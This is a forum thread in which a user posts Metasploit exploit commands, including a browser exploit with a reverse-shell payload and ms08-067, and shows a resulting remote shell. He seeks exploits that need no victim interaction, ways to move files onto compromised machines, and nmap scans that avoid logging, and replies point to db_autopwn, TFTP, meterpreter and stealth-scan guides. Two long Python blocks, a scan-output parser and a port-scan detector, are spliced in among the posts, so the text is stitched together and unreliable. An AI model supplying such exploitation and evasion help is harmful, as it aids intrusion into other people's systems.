problem with use MSF

Viewing 21 reply threads
    • #3010
      mr.Z
      Participant

      I have some problems using Metasploit.

      I'm testing more exploits but without success; I don't know what the problem is.

      Look at this example:

      use windows/browser/ani_loadimage_chunksize

      set SRVHOST myip

      set SRVPORT 8000

      set URIPATH nono

      set payload windows/shell_reverse_tcp

      set LHOST ip victim

      >exploit

      [*] Started reverse handler
      [*] Using URL: http://ip:8000/nono
      [*] Server started.

      Then I tested this on OS XP SP with IE 7 and IE 6.

      Then it tells me:
      [*] Sending HTML page to ip:6668...
      [*] Sending ANI file to ip:6668...

      I'm waiting but nothing happens.

      >> sessions -l

      Active sessions
      ===============
      No active sessions.

      What is the problem >>>???

      Any idea?

      And can anyone give me some exploits working on XP SP2 and SP3?

    • #20579
      BillV
      Participant

      Sounds like it’s not vulnerable.

    • #20580
      mr.Z
      Participant

      Thanks.

      But it shows me the target:

      --  ----
      0   (Automatic) IE6, IE7 and Firefox on Windows NT, 2000, XP, 2003 and Vista

      And I tested on 7 PCs, same problem ;D

    • #20581
      BillV
      Participant

      Just because those are listed as targets, doesn’t mean they’re vulnerable… just what the exploit can attack.

    • #20582
      mr.Z
      Participant

      OK, thanks.

      But can you give me the names of some exploits working on Win XP SP1, SP2, SP3, Vista?

      And I want an exploit I can use without sending the URL to the victim.

      I'm using MSF under Windows XP.

    • #20583
      BillV
      Participant

      @mr.Z wrote:

      I'm using MSF under Windows XP.

      There’s your first problem. Run it under Linux.

      I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.

    • #20584
      Anonymous
      Participant

      ms08-067 exploit

    • #20585
      mr.Z
      Participant

      @BillV wrote:

      @mr.Z wrote:

      I'm using MSF under Windows XP.

      There’s your first problem. Run it under Linux.

      I can’t tell you what exploit to use, it depends on what your target is vulnerable to. As you’ve already figured out how to do, you can see which exploits will work against which targets.

      Thanks a lot, now I'm working in Linux and have updated MSF.

      —-
      ChrisG

      Thanks.

      I tested this exploit but it shows me this problem message:

      [*] Started bind handler
      [-] Exploit failed: The connection timed out (ip-vicitm:4444).
      [*] Exploit completed, but no session was created.

      Why does this not work, what is the problem?

      But no session was created????

      Please tell me.

    • #20586
      apollo
      Participant

      You probably aren’t vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.

    • #20587
      mr.Z
      Participant

      @apollo wrote:

      You probably aren’t vulnerable to that either, or something was wrong.  Since you may not be vulnerable to much, you may want to check out DVL linux (damn vulnerable linux) and start messing around on there.  That might get you further in the process.  Or install windows xp without service packs or patches and then metasploit becomes a lot more interesting.

      You are correct, but I want to test on fully patched Windows XP,
      and I have tried a lot and I was shown that if port 445 is open then you can use the ms08-067 exploit, and if Windows XP is fully patched.

      Any more ideas?

    • #20588
      BillV
      Participant

      @mr.Z wrote:

      any more Idea?

      Yes, I think you need to do more research and studying regarding exploits and how metasploit works.

      I suggest you start here.

      BillV

    • #20589
      apollo
      Participant

      I’ll be slightly more helpful, if you have NO idea what something is vulnerable to, you may want to try a vulnerability scanner like nessus.  There is another option for you to google which is db_autopwn.  If you search for that, and you use backtrack3 things will get easier for you.  If you use this approach for evil, you will get caught, it is EXTREMELY noisy and will have a low success rate.  If you do find a vulnerability, do a sessions -lv and it will show you what exploit you are vulnerable to.

    • #20590
      geekyone
      Participant

      @mr.Z wrote:

      You are correct, but I want to test on fully patched Windows XP,
      and I have tried a lot and I was shown that if port 445 is open then you can use the ms08-067 exploit, and if Windows XP is fully patched.

      Any more ideas?

      Your biggest problem is trying to exploit a fully patched windows xp box with metasploit.  If you want to learn more about metasploit and practice pen testing techniques don’t attack a fully patched box in your lab. 

      Metasploit doesn’t have any zero day vulnerabilities included in it (currently), so you are never going to be able to successfully exploit a fully patched box with Metasploit right now.  Now, if you really want to exploit a fully patched XP box, you should take BillV’s suggestion to heart, because that is going to involve getting into zero day vulnerability research, which requires an in-depth understanding of how exploits work.  If you want to get into that, I recommend starting by reading Hacking: The Art of Exploitation, 2nd Edition.

    • #20591
      mr.Z
      Participant

      THANK YOU ALL

      Now I have installed Windows XP without service packs

      and exploited this Windows.

      I use the payload
      >"windows/shell_reverse_tcp"
      >exploit
      >Microsoft Windows XP [Version 5.1.2600]
      (C) Copyright 1985-2001 Microsoft Corp.

      C:\WINDOWS\system32>

      But I can't upload some files; I'm using this MSF under Linux.

      I tested some commands like this:
      >copy /root/xx.txt c:

      but without success; the error message is:
      >copy /root/xx.txt c:
      The syntax of the command is incorrect

    • #20592
      KrisTeason
      Participant

      If you're getting files from a command prompt, you have to get familiar with the tftp command. Remember to start the TFTP server on your Linux box; when requesting the files using tftp they come from your /tmp directory. You might want to try the meterpreter/shell_reverse_tcp payload and use the upload from there, it’s quicker. The meterpreter also has a lot of other useful options as well.

    • #20593
      mr.Z
      Participant

      Now OK, I'm using tftp.
      Now I have a laptop and scanned it using nmap:
      nmap -PN -p 445,21,135,139 192.168.1.1
      It says:
      Interesting ports on 192.168.1.1:
      PORT    STATE    SERVICE
      445/tcp filtered microsoft-ds
      135/tcp filtered
      .....
      What can I do about this problem? I want to exploit this; my OS is Win.
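      The scan above reports `filtered` rather than `open`, which means a firewall (here the XP host firewall) is dropping the probes and nothing is listening that the scanner can reach. The following parser is an added example, not code from the thread or from the nmap project: it reads nmap's normal output (the "Interesting ports on" format shown above, plus the newer "Nmap scan report for" header) into structured records and classifies each host as firewalled, exposed, or without listeners, which is the check a defender runs to confirm a host's exposure. The sample output is constructed for the example.

```python
import re
from collections import Counter

# Constructed sample of nmap "normal" output, modelled on the snippet in the thread.
SAMPLE_OUTPUT = """\
Interesting ports on 192.168.1.1:
PORT    STATE    SERVICE
445/tcp filtered microsoft-ds
135/tcp filtered
139/tcp filtered netbios-ssn
21/tcp  closed   ftp

Nmap scan report for 192.168.1.20
PORT    STATE SERVICE
445/tcp open  microsoft-ds
135/tcp open  msrpc
"""

# Host header: old format ends with a colon, newer format does not.
HOST_RE = re.compile(r"^(?:Interesting ports on|Nmap scan report for) ([^\s:]+):?$")
# Port line: "<port>/<proto> <state> [service]"; longer state names listed first
# so "open|filtered" is not truncated to "open".
PORT_RE = re.compile(
    r"^(\d+)/(tcp|udp)\s+"
    r"(open\|filtered|closed\|filtered|unfiltered|open|closed|filtered)"
    r"(?:\s+(\S+))?"
)


def parse_nmap_output(text):
    """Return {host: [{"port", "proto", "state", "service"}, ...]} from nmap normal output."""
    results = {}
    host = None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)
            results[host] = []
            continue
        m = PORT_RE.match(line)
        if m and host is not None:
            port, proto, state, service = m.groups()
            results[host].append(
                {"port": int(port), "proto": proto, "state": state, "service": service or ""}
            )
    return results


def exposure_summary(results):
    """Classify each host: 'exposed' (something open), 'firewalled' (only filtered/closed,
    at least one filtered), or 'no-listeners' (everything closed)."""
    summary = {}
    for host, ports in results.items():
        counts = Counter(p["state"] for p in ports)
        open_ports = sorted(p["port"] for p in ports if p["state"] == "open")
        if open_ports:
            verdict = "exposed"
        elif counts.get("filtered", 0) > 0:
            verdict = "firewalled"
        else:
            verdict = "no-listeners"
        summary[host] = {"counts": dict(counts), "verdict": verdict, "open_ports": open_ports}
    return summary


if __name__ == "__main__":
    parsed = parse_nmap_output(SAMPLE_OUTPUT)
    for host, info in exposure_summary(parsed).items():
        print(host, info["verdict"], info["open_ports"], info["counts"])
```

Feed it real output with `parse_nmap_output(open("scan.txt").read())`; a host that comes back `firewalled` on 445/135/139 is the expected result for an XP box with the firewall on, and the only thing worth chasing is why an `exposed` host has those ports reachable at all.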

    • #20594
      Anonymous
      Participant

      you’ll have to do a udp scan to see your open udp port 🙂

    • #20595
      mr.Z
      Participant

      OK, thank you for the extra info.

      But I want to ask you about the tool nmap: if I use it to scan, is it safe? I mean, if I scan some IP, does this register my IP in the server's log or what?

      If you have a parameter or command for nmap that doesn't get registered in the log, please give it to me.

      Like this:

      nmap -sS hostname

      If I scan with this, is it safe or what?

    • #20596
      Anonymous
      Participant

      Using nmap is not safe, most scan will send packets to the target IP address. What the remote system does with these packets is up to them but logging, port scan detection and other techniques may be used to identify the scan.

      Jimbob
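      The logging and port scan detection mentioned above is straightforward to do on the receiving side. As an added example, not from the thread or from any tool named in it, the script below runs a simple scan detector over constructed firewall log lines: it groups dropped SYN packets by source and destination and raises an alert when one source hits a threshold number of distinct destination ports within a time window. The log format, thresholds and addresses are assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of iptables/UFW-style "kernel" firewall log lines.
# 192.168.1.50 sweeps five ports in two seconds; 192.168.1.77 touches two ports 25 minutes apart.
SAMPLE_LOG = """\
2024-05-01T10:00:00 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=40001 DPT=21 SYN
2024-05-01T10:00:00 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=40002 DPT=135 SYN
2024-05-01T10:00:01 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=40003 DPT=139 SYN
2024-05-01T10:00:01 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=40004 DPT=445 SYN
2024-05-01T10:00:02 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.50 DST=192.168.1.1 PROTO=TCP SPT=40005 DPT=3389 SYN
2024-05-01T10:05:00 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.77 DST=192.168.1.1 PROTO=TCP SPT=51000 DPT=445 SYN
2024-05-01T10:30:00 host kernel: [FW BLOCK] IN=eth0 SRC=192.168.1.77 DST=192.168.1.1 PROTO=TCP SPT=51001 DPT=139 SYN
"""

LINE_RE = re.compile(
    r"^(\S+) \S+ kernel: \[FW BLOCK\] .*?SRC=(\S+) DST=(\S+) PROTO=(\S+) .*?DPT=(\d+)"
)


def parse_line(line):
    """Extract timestamp, source, destination, protocol and destination port; None if no match."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts, src, dst, proto, dpt = m.groups()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "proto": proto, "dpt": int(dpt)}


def detect_port_scans(log_text, threshold=5, window=timedelta(seconds=60)):
    """Alert on any (src, dst) pair that probes >= threshold distinct ports within `window`.
    One alert per pair, reporting the densest window seen."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            events[(ev["src"], ev["dst"])].append((ev["ts"], ev["dpt"]))

    alerts = []
    for (src, dst), evs in events.items():
        evs.sort()
        start = 0
        best_ports, best_span = set(), None
        # Two-pointer sliding window over time-sorted events.
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1
            ports = {dpt for _, dpt in evs[start:end + 1]}
            if len(ports) > len(best_ports):
                best_ports, best_span = ports, (evs[start][0], evs[end][0])
        if len(best_ports) >= threshold:
            alerts.append({"src": src, "dst": dst, "ports": sorted(best_ports),
                           "first": best_span[0].isoformat(), "last": best_span[1].isoformat()})
    return alerts


if __name__ == "__main__":
    for a in detect_port_scans(SAMPLE_LOG):
        print(f"port scan from {a['src']} against {a['dst']}: {a['ports']} ({a['first']} .. {a['last']})")
```

With the defaults the fast sweep is flagged and the two slow probes are not; lowering `threshold` or widening `window` trades false positives for catching slow scans, which is exactly the tuning a SYN scan cannot opt out of on the target side, since the packets themselves are what gets logged.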

    • #20597
      mr.Z
      Participant

      But somebody says that using this command is safe?

      nmap -sS -O -v hostname

      OK, can you tell me what the solution is?

    • #20598
      RoleReversal
      Participant

      @mr.Z wrote:

      But somebody says that using this command is safe?

      nmap -sS -O -v hostname

      OK, can you tell me what the solution is?

      I’m a bit confused, what do you mean by ‘safe’?

      • liable to crash the target?
      • liable to get you arrested?
      • liable to start world war 3?

      All (well ok most) depend on your hardware, target and situation.

    • #20599
      KrisTeason
      Participant

      I think he’s trying to figure out which scan would be the noisiest and which scan would be safer to run without being logged. You should look into:
      http://www.nmap-tutorial.com/
      and download the Nmap Tutorial PDF. I just gave it a quick read through; it tells you what parameters you could set in nmap to make it less detectable on hosts.
